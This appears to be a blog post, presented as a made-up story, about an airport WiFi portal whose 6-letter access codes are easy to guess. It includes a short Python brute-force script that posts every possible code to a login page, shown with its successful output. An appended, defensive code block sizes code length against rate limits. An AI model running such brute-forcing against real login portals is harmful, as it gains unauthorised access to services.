Artificial truth

The more you see, the less you believe.


Mind your keyspace, $airport
Wed 09 May 2018

(This is of course a completely made up story that I entirely invented because I was bored.)

Today, I was waiting for my flight in an international airport, so I thought about giving the WiFi a try. Unsurprisingly, I was asked for an email address, a full name, and a working phone number, to send me a 6-letter code.

I mumbled something about the GDPR while reading the captive portal's webpage, and stumbled upon these two sentences:

After you register, your code will be stored for 12 months. During this period you can reconnect without having to register again.

For extra kindness, the page provides a nice example of what a code might look like: 6 capital letters.

So, an airport handling a bit less than 30 million passengers per year is using secret codes with a limit of 26⁶ (308.915.776) different possibilities… Since the WiFi is free (you're paying with your personal data and by receiving spam), odds are that a significant percentage of people are using it. With a conversion rate of ⅛, a blind guess would have a ~1% chance of being correct. Codes give 2h of internet access, and are automatically reset every 5 hours.

import itertools
import string

import requests

# Walk the full 26**6 keyspace of 6-letter uppercase codes.
ks = itertools.product(string.ascii_uppercase, repeat=6)
for c in ks:
    code = ''.join(c)
    r = requests.post('https://super-airport.plane/login.php', data={'secret_code': code, 'submit': 'Login'})
    # The portal returns this message for any code that is not valid.
    if 'This code is invalid.' not in r.text:
        print(code)
        break

Resulting in:

jvoisin@grimhilde 16:03 ~ python test.py
AAAAAL

Yay, free WiFi.
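
The keyspace arithmetic above, turned into a sizing check for whoever operates such a portal. This is an added example, not code from the original post; the function names, the rate limit of 100 attempts per client and the 1e-6 risk target are assumptions chosen for illustration.

```python
import math
import secrets
import string

def valid_codes(passengers_per_year: int, conversion: float, retention_months: int) -> int:
    """Codes that are valid at any moment, given how long each one is retained."""
    return round(passengers_per_year * conversion * retention_months / 12)

def p_hit(valid: int, alphabet: int, length: int, guesses: int = 1) -> float:
    """Chance that at least one of `guesses` random guesses is a valid code.

    Assumption: guesses are independent and codes are uniformly distributed.
    """
    p_single = min(1.0, valid / alphabet ** length)
    if p_single >= 1.0:
        return 1.0
    return -math.expm1(guesses * math.log1p(-p_single))

def expected_guesses(valid: int, alphabet: int, length: int) -> float:
    """Mean number of guesses before the first valid code is found."""
    return alphabet ** length / valid

def min_length(valid: int, alphabet: int, guesses: int, max_risk: float) -> int:
    """Shortest code length keeping p_hit at or below `max_risk` for a
    client that the portal's rate limit allows `guesses` attempts."""
    length = 1
    while p_hit(valid, alphabet, length, guesses) > max_risk:
        length += 1
    return length

def new_code(length: int, alphabet: str = string.ascii_uppercase) -> str:
    """Draw a code from the OS CSPRNG so codes are uniform and unpredictable."""
    return "".join(secrets.choice(alphabet) for _ in range(length))

if __name__ == "__main__":
    # Figures from the article: ~30 million passengers, 1/8 register, 12-month retention.
    valid = valid_codes(30_000_000, 1 / 8, 12)
    print(f"valid codes: {valid}")
    print(f"per-guess hit chance, 6 letters: {p_hit(valid, 26, 6):.4f}")
    print(f"mean guesses to a hit: {expected_guesses(valid, 26, 6):.0f}")
    # Assumed policy (not from the article): 100 attempts per client, 1e-6 risk.
    n = min_length(valid, 26, 100, 1e-6)
    print(f"length needed: {n}, e.g. {new_code(n)}")
```

Shortening the retention period lowers the number of valid codes and therefore the length needed, which is why the 12-month storage matters as much as the 6-letter format.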